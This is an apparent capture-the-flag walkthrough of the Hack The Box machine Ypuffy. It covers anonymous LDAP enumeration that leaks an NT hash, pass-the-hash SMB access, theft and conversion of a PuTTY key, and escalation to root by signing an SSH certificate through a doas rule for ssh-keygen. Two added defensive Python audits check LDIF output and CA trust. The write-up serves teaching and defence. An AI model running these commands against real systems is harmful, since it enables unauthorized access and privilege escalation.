[HTB Series] A Detailed Penetration Test of the Ypuffy Machine

 

====================================================================

 

Information Gathering

We use nmap to gather information about the target machine:

nmap -sV -sT -sC -T5 10.10.10.107
Starting Nmap 7.70 ( https://nmap.org ) at 2019-02-13 17:25 CST
Warning: 10.10.10.107 giving up on port because retransmission cap hit (2).
Nmap scan report for 10.10.10.107
Host is up (0.29s latency).
Not shown: 940 closed ports, 55 filtered ports
PORT    STATE SERVICE     VERSION
22/tcp  open  ssh         OpenSSH 7.7 (protocol 2.0)
| ssh-hostkey: 
|   2048 2e:19:e6:af:1b:a7:b0:e8:07:2a:2b:11:5d:7b:c6:04 (RSA)
|   256 dd:0f:6a:2a:53:ee:19:50:d9:e5:e7:81:04:8d:91:b6 (ECDSA)
|_  256 21:9e:db:bd:e1:78:4d:72:b0:ea:b4:97:fb:7f:af:91 (ED25519)
80/tcp  open  http        OpenBSD httpd
| fingerprint-strings: 
|   DNSVersionBindReqTCP, RPCCheck: 
|     HTTP/1.0 400 Bad Request
|     Date: Wed, 13 Feb 2019 09:26:59 GMT
|     Server: OpenBSD httpd
|     Connection: close
|     Content-Type: text/html
|     Content-Length: 431
|     <!DOCTYPE html>
|     <html>
|     <head>
|     <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
|     <title>400 Bad Request</title>
|     <style type="text/css"><!--
|     body { background-color: white; color: black; font-family: 'Comic Sans MS', 'Chalkboard SE', 'Comic Neue', sans-serif; }
|     border: 0; border-bottom: 1px dashed; }
|     --></style>
|     </head>
|     <body>
|     <h1>400 Bad Request</h1>
|     <hr>
|     <address>OpenBSD httpd</address>
|     </body>
|     </html>
|   GenericLines: 
|     HTTP/1.0 400 Bad Request
|     Date: Wed, 13 Feb 2019 09:26:55 GMT
|     Server: OpenBSD httpd
|     Connection: close
|     Content-Type: text/html
|     Content-Length: 431
|     <!DOCTYPE html>
|     <html>
|     <head>
|     <meta http-equiv="Content-Type" content="text/html; charset=utf-8"/>
|     <title>400 Bad Request</title>
|     <style type="text/css"><!--
|     body { background-color: white; color: black; font-family: 'Comic Sans MS', 'Chalkboard SE', 'Comic Neue', sans-serif; }
|     border: 0; border-bottom: 1px dashed; }
|     --></style>
|     </head>
|     <body>
|     <h1>400 Bad Request</h1>
|     <hr>
|     <address>OpenBSD httpd</address>
|     </body>
|_    </html>
|_http-server-header: OpenBSD httpd
139/tcp open  netbios-ssn Samba smbd 3.X - 4.X (workgroup: YPUFFY)
389/tcp open  ldap        (Anonymous bind OK)
445/tcp open  netbios-ssn Samba smbd 4.7.6 (workgroup: YPUFFY)

From the report we learn that SSH is running on port 22, HTTP on port 80, SMB on ports 139 and 445, and LDAP on port 389.

Let's look at port 80 first.

Something seems to be wrong there (the connection is reset), so let's turn to the SMB service instead

and see whether we can enumerate shares anonymously:

smbmap -H 10.10.10.107

It reports an authentication failure.

 

Let's switch to LDAP; the nmap report indicated that LDAP allows anonymous binds.

We use the ldapsearch tool to query it:

ldapsearch -h 10.10.10.107 -p 389 -x -b dc=hackthebox,dc=htb

-h: target IP address

-p: port the server listens on

-x: simple authentication (an anonymous bind here, since no credentials are supplied)

-b: search base (the entry the search starts from)

 

# extended LDIF
#
# LDAPv3
# base <dc=hackthebox,dc=htb> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#

# hackthebox.htb
dn: dc=hackthebox,dc=htb
dc: hackthebox
objectClass: top
objectClass: domain

# passwd, hackthebox.htb
dn: ou=passwd,dc=hackthebox,dc=htb
ou: passwd
objectClass: top
objectClass: organizationalUnit

# bob8791, passwd, hackthebox.htb
dn: uid=bob8791,ou=passwd,dc=hackthebox,dc=htb
uid: bob8791
cn: Bob
objectClass: account
objectClass: posixAccount
objectClass: top
userPassword:: e0JTREFVVEh9Ym9iODc5MQ==
uidNumber: 5001
gidNumber: 5001
gecos: Bob
homeDirectory: /home/bob8791
loginShell: /bin/ksh

# alice1978, passwd, hackthebox.htb
dn: uid=alice1978,ou=passwd,dc=hackthebox,dc=htb
uid: alice1978
cn: Alice
objectClass: account
objectClass: posixAccount
objectClass: top
objectClass: sambaSamAccount
userPassword:: e0JTREFVVEh9YWxpY2UxOTc4
uidNumber: 5000
gidNumber: 5000
gecos: Alice
homeDirectory: /home/alice1978
loginShell: /bin/ksh
sambaSID: S-1-5-21-3933741069-3307154301-3557023464-1001
displayName: Alice
sambaAcctFlags: [U          ]
sambaPasswordHistory: 00000000000000000000000000000000000000000000000000000000
sambaNTPassword: 0B186E661BBDBDCF6047784DE8B9FD8B
sambaPwdLastSet: 1532916644

# group, hackthebox.htb
dn: ou=group,dc=hackthebox,dc=htb
ou: group
objectClass: top
objectClass: organizationalUnit

# bob8791, group, hackthebox.htb
dn: cn=bob8791,ou=group,dc=hackthebox,dc=htb
objectClass: posixGroup
objectClass: top
cn: bob8791
userPassword:: e2NyeXB0fSo=
gidNumber: 5001

# alice1978, group, hackthebox.htb
dn: cn=alice1978,ou=group,dc=hackthebox,dc=htb
objectClass: posixGroup
objectClass: top
cn: alice1978
userPassword:: e2NyeXB0fSo=
gidNumber: 5000

# ypuffy, hackthebox.htb
dn: sambadomainname=ypuffy,dc=hackthebox,dc=htb
sambaDomainName: YPUFFY
sambaSID: S-1-5-21-3933741069-3307154301-3557023464
sambaAlgorithmicRidBase: 1000
objectclass: sambaDomain
sambaNextUserRid: 1000
sambaMinPwdLength: 5
sambaPwdHistoryLength: 0
sambaLogonToChgPwd: 0
sambaMaxPwdAge: -1
sambaMinPwdAge: 0
sambaLockoutDuration: 30
sambaLockoutObservationWindow: 30
sambaLockoutThreshold: 0
sambaForceLogoff: -1
sambaRefuseMachinePwdChange: 0
sambaNextRid: 1001

# search result
search: 2
result: 0 Success

# numResponses: 9
# numEntries: 8
 

We can also enumerate LDAP with nmap, using its ldap-search script:

nmap -p 389 --script ldap-search 10.10.10.107


PORT    STATE SERVICE
389/tcp open  ldap
| ldap-search: 
|   Context: dc=hackthebox,dc=htb
|     dn: dc=hackthebox,dc=htb
|         dc: hackthebox
|         objectClass: top
|         objectClass: domain
|     dn: ou=passwd,dc=hackthebox,dc=htb
|         ou: passwd
|         objectClass: top
|         objectClass: organizationalUnit
|     dn: uid=bob8791,ou=passwd,dc=hackthebox,dc=htb
|         uid: bob8791
|         cn: Bob
|         objectClass: account
|         objectClass: posixAccount
|         objectClass: top
|         userPassword: {BSDAUTH}bob8791
|         uidNumber: 5001
|         gidNumber: 5001
|         gecos: Bob
|         homeDirectory: /home/bob8791
|         loginShell: /bin/ksh
|     dn: uid=alice1978,ou=passwd,dc=hackthebox,dc=htb
|         uid: alice1978
|         cn: Alice
|         objectClass: account
|         objectClass: posixAccount
|         objectClass: top
|         objectClass: sambaSamAccount
|         userPassword: {BSDAUTH}alice1978
|         uidNumber: 5000
|         gidNumber: 5000
|         gecos: Alice
|         homeDirectory: /home/alice1978
|         loginShell: /bin/ksh
|         sambaSID: S-1-5-21-3933741069-3307154301-3557023464-1001
|         displayName: Alice
|         sambaAcctFlags: [U          ]
|         sambaPasswordHistory: 00000000000000000000000000000000000000000000000000000000
|         sambaNTPassword: 0B186E661BBDBDCF6047784DE8B9FD8B
|         sambaPwdLastSet: 1532916644
|     dn: ou=group,dc=hackthebox,dc=htb
|         ou: group
|         objectClass: top
|         objectClass: organizationalUnit
|     dn: cn=bob8791,ou=group,dc=hackthebox,dc=htb
|         objectClass: posixGroup
|         objectClass: top
|         cn: bob8791
|         userPassword: {crypt}*
|         gidNumber: 5001
|     dn: cn=alice1978,ou=group,dc=hackthebox,dc=htb
|         objectClass: posixGroup
|         objectClass: top
|         cn: alice1978
|         userPassword: {crypt}*
|         gidNumber: 5000
|     dn: sambadomainname=ypuffy,dc=hackthebox,dc=htb
|         sambaDomainName: YPUFFY
|         sambaSID: S-1-5-21-3933741069-3307154301-3557023464
|         sambaAlgorithmicRidBase: 1000
|         objectclass: sambaDomain
|         sambaNextUserRid: 1000
|         sambaMinPwdLength: 5
|         sambaPwdHistoryLength: 0
|         sambaLogonToChgPwd: 0
|         sambaMaxPwdAge: -1
|         sambaMinPwdAge: 0
|         sambaLockoutDuration: 30
|         sambaLockoutObservationWindow: 30
|         sambaLockoutThreshold: 0
|         sambaForceLogoff: -1
|         sambaRefuseMachinePwdChange: 0
|_        sambaNextRid: 1001

Nmap done: 1 IP address (1 host up) scanned in 6.60 seconds
 

We obtain a username, alice1978, and an SMB NT hash: 0B186E661BBDBDCF6047784DE8B9FD8B

This hash cannot be cracked, but we can still use it directly for authentication (pass-the-hash).
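As an added defensive check (it is not part of the original writeup), this Python parses ldapsearch LDIF output such as the listing above, decodes the double-colon (::) base64 values, and flags credential material that an anonymous bind should never be able to read. The embedded LDIF is a constructed subset of that listing.

```python
import base64

# Constructed sample: a subset of the anonymous ldapsearch output quoted above.
SAMPLE_LDIF = """\
# extended LDIF
dn: uid=bob8791,ou=passwd,dc=hackthebox,dc=htb
userPassword:: e0JTREFVVEh9Ym9iODc5MQ==

dn: uid=alice1978,ou=passwd,dc=hackthebox,dc=htb
objectClass: sambaSamAccount
userPassword:: e0JTREFVVEh9YWxpY2UxOTc4
sambaNTPassword: 0B186E661BBDBDCF6047784DE8B9FD8B
"""


def parse_ldif(text):
    """Parse LDIF into one {attribute: [values]} dict per entry (attribute names
    lower-cased; '#' comments and 'attr:: <base64>' values are handled)."""
    entries, current = [], {}
    for line in text.splitlines() + [""]:   # trailing "" flushes the last entry
        if line.startswith("#"):
            continue
        if not line.strip():
            if current:
                entries.append(current)
                current = {}
            continue
        attr, _, value = line.partition(":")
        if value.startswith(":"):           # base64-encoded value
            value = base64.b64decode(value[1:].strip()).decode("utf-8", "replace")
        current.setdefault(attr.strip().lower(), []).append(value.strip())
    return entries


def audit_entries(entries):
    """Return (severity, dn, message) for credential data an anonymous bind can read."""
    findings = []
    for entry in entries:
        dn = entry.get("dn", ["<no dn>"])[0]
        for nt_hash in entry.get("sambantpassword", []):
            # An NT hash is directly usable for SMB authentication (pass-the-hash).
            findings.append(("HIGH", dn, "sambaNTPassword exposed: " + nt_hash))
        for pw in entry.get("userpassword", []):
            scheme = pw[1:pw.index("}")] if pw.startswith("{") and "}" in pw else "cleartext"
            # {BSDAUTH} only delegates to the system login database; any other
            # scheme ({crypt}, {SSHA}, ...) or cleartext leaks a crackable secret.
            severity = "INFO" if scheme == "BSDAUTH" else "MEDIUM"
            findings.append((severity, dn, "userPassword readable, scheme " + scheme))
    return findings
```

Run it against the full ldapsearch output (or a bind-restricted directory, which should yield no HIGH findings) to confirm that password attributes are not readable anonymously.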

 

Next we enumerate SMB using the account and hash we obtained.

Here we use crackmapexec:

crackmapexec 10.10.10.107 -u alice1978 -H 0B186E661BBDBDCF6047784DE8B9FD8B --shares

There are two shares: alice, which is readable and writable, and IPC$, which we are not allowed to access.

 

We can also list the shares with smbclient:

smbclient -U alice1978%0B186E661BBDBDCF6047784DE8B9FD8B --pw-nt-hash -L //10.10.10.107/

Then we connect to the alice share:

smbclient -U alice1978%0B186E661BBDBDCF6047784DE8B9FD8B --pw-nt-hash //10.10.10.107/alice

It contains only one file, my_private_key.ppk.

Download it with:

get my_private_key.ppk

 

.ppk is the file extension PuTTY uses for the keys of its remote logins, so we need to convert it.

my_private_key.ppk is a PuTTY private key; we need to convert it to an OpenSSH private key in order to SSH with it.

On Kali, we install putty-tools:

apt-get install putty-tools

Then we use puttygen:

puttygen my_private_key.ppk -O private-openssh -o alice.key

Then restrict the key's permissions (ssh refuses private keys readable by other users):

chmod 600 alice.key

Finally, connect:

ssh -i alice.key alice1978@10.10.10.107

 

Remember that HTTP connections were being reset? Let's look at /etc/httpd.conf.

location "/userca*"

location "/sshauth*"

There are two location blocks, both of which redirect.

We also discover two more users.

In bob8791's home directory there is a SQL file; it creates a table named principals and another named keys.

Let's also check the sshd_config file under /etc/ssh/:

 

#       $OpenBSD: sshd_config,v 1.102 2018/02/16 02:32:40 djm Exp $

# This is the sshd server system-wide configuration file.  See
# sshd_config(5) for more information.

# The strategy used for options in the default sshd_config shipped with
# OpenSSH is to specify options with their default value where
# possible, but leave them commented.  Uncommented options override the
# default value.

#Port 22
#AddressFamily any
#ListenAddress 0.0.0.0
#ListenAddress ::

#HostKey /etc/ssh/ssh_host_rsa_key
#HostKey /etc/ssh/ssh_host_ecdsa_key
#HostKey /etc/ssh/ssh_host_ed25519_key

# Ciphers and keying
#RekeyLimit default none

# Logging
#SyslogFacility AUTH
#LogLevel INFO

# Authentication:

#LoginGraceTime 2m
PermitRootLogin prohibit-password
#StrictModes yes
#MaxAuthTries 6
#MaxSessions 10

#PubkeyAuthentication yes

# The default is to check both .ssh/authorized_keys and .ssh/authorized_keys2
# but this is overridden so installations will only check .ssh/authorized_keys
AuthorizedKeysFile      .ssh/authorized_keys

#AuthorizedPrincipalsFile none

AuthorizedKeysCommand /usr/local/bin/curl http://127.0.0.1/sshauth?type=keys&username=%u
AuthorizedKeysCommandUser nobody

TrustedUserCAKeys /home/userca/ca.pub
AuthorizedPrincipalsCommand /usr/local/bin/curl http://127.0.0.1/sshauth?type=principals&username=%u
AuthorizedPrincipalsCommandUser nobody

# For this to work you will also need host keys in /etc/ssh/ssh_known_hosts
#HostbasedAuthentication no
# Change to yes if you don't trust ~/.ssh/known_hosts for
# HostbasedAuthentication
#IgnoreUserKnownHosts no
# Don't read the user's ~/.rhosts and ~/.shosts files
#IgnoreRhosts yes

# To disable tunneled clear text passwords, change to no here!
PasswordAuthentication no
#PermitEmptyPasswords no

# Change to no to disable s/key passwords
ChallengeResponseAuthentication no

AllowAgentForwarding no
AllowTcpForwarding no
#GatewayPorts no
X11Forwarding no
#X11DisplayOffset 10
#X11UseLocalhost yes
#PermitTTY yes
#PrintMotd yes
#PrintLastLog yes
#TCPKeepAlive yes
#UseLogin no
#PermitUserEnvironment no
#Compression delayed
#ClientAliveInterval 0
#ClientAliveCountMax 3
#UseDNS no
#PidFile /var/run/sshd.pid
#MaxStartups 10:30:100
#PermitTunnel no
#ChrootDirectory none
#VersionAddendum none

# no default banner path
#Banner none

# override default of no subsystems
Subsystem       sftp    /usr/libexec/sftp-server

# Example of overriding settings on a per-user basis
#Match User anoncvs
#       X11Forwarding no
#       AllowTcpForwarding no
#       PermitTTY no
#       ForceCommand cvs server

 

 

So the HTTP service is responsible for part of the SSH authentication.

Let's request the first endpoint with curl:

curl 'http://127.0.0.1/sshauth?type=keys&username=root'

Nothing is returned.

Now the second one:

curl 'http://127.0.0.1/sshauth?type=principals&username=root'

Requesting root's keys gave us no response, but requesting root's principals returns 3m3rgencyB4ckd00r.

 

Generating and Signing an SSH Key to Obtain Root

So now we have root's principal, 3m3rgencyB4ckd00r. In theory, if we generate an SSH key pair and have it signed with root's principal, we will be able to SSH in as root with it.

The problem is that, as alice1978, we are not authorized to do that.

On Linux we would check whether we can run elevated commands with sudo -l,

but that is not available here.

Let's check doas instead.

doas is the privilege-management tool on BSD-family systems, the counterpart of sudo on Debian-family systems.

Here we see that alice1978 can run /usr/bin/ssh-keygen as the user userca without a password.

The first step is to create an SSH key pair:

ssh-keygen -t rsa -f /tmp/id_rsa

Then we need the certificate authority (CA): we go to /home/userca/

and sign the SSH key we just created, using

-s: the CA key to sign with

-I: the certificate identity

-n: the principal

Finally we SSH in as root:

ssh -i /tmp/id_rsa root@localhost
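As an added audit (example code written for this page, not from the original writeup), the following Python cross-checks the TrustedUserCAKeys line quoted from sshd_config above against doas rules, to answer the question that decided this box: which users can sign certificates that sshd will trust? The doas.conf line is reconstructed from the description above (the file itself is not shown), and the CA private key is assumed to live in the home directory of the user whose home holds TrustedUserCAKeys, as it does here.

```python
# Constructed inputs: the certificate-related sshd_config lines quoted above and a
# doas.conf rule reconstructed from the writeup's description (the file itself is not shown).
SSHD_CONFIG = """\
#AuthorizedPrincipalsFile none
TrustedUserCAKeys /home/userca/ca.pub
AuthorizedPrincipalsCommand /usr/local/bin/curl http://127.0.0.1/sshauth?type=principals&username=%u
AuthorizedPrincipalsCommandUser nobody
"""
DOAS_CONF = "permit nopass alice1978 as userca cmd /usr/bin/ssh-keygen\n"


def parse_sshd_config(text):
    """Effective keyword -> value map; like sshd, the first occurrence of a keyword wins."""
    options = {}
    for line in text.splitlines():
        line = line.strip()
        if line and not line.startswith("#"):
            key, _, value = line.partition(" ")
            options.setdefault(key.lower(), value.strip())
    return options


def parse_doas_conf(text):
    """Parse 'permit [options] USER [as TARGET] [cmd CMD]' rules (target defaults to root)."""
    rules = []
    for line in text.splitlines():
        tokens = [t for t in line.split() if t not in ("nopass", "persist", "keepenv")]
        if len(tokens) < 2 or tokens[0] != "permit":
            continue
        rule = {"user": tokens[1], "as": "root", "cmd": None}
        for i in range(2, len(tokens) - 1):
            if tokens[i] in ("as", "cmd"):
                rule[tokens[i]] = tokens[i + 1]
        rules.append(rule)
    return rules


def who_can_mint_trusted_certs(sshd_text, doas_text):
    """Return doas identities able to run ssh-keygen as the owner of the trusted CA key.

    Assumes the CA private key lives beside TrustedUserCAKeys under /home/<owner>/,
    as on this box, so signing as that owner yields certificates sshd accepts for
    any principal its AuthorizedPrincipalsCommand hands back (root's included).
    """
    ca_pub = parse_sshd_config(sshd_text).get("trustedusercakeys", "")
    parts = ca_pub.split("/")
    if len(parts) < 3 or parts[1] != "home":
        return []                       # no CA trust configured, or not a home-dir CA
    owner = parts[2]
    return [r["user"] for r in parse_doas_conf(doas_text)
            if r["as"] == owner and r["cmd"] in (None, "/usr/bin/ssh-keygen")]
```

Any name this returns other than the administrators who are meant to operate the CA is a privilege-escalation path to every account the principals service can name, so the fix is to remove that doas rule or move the CA key out of a user's home.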
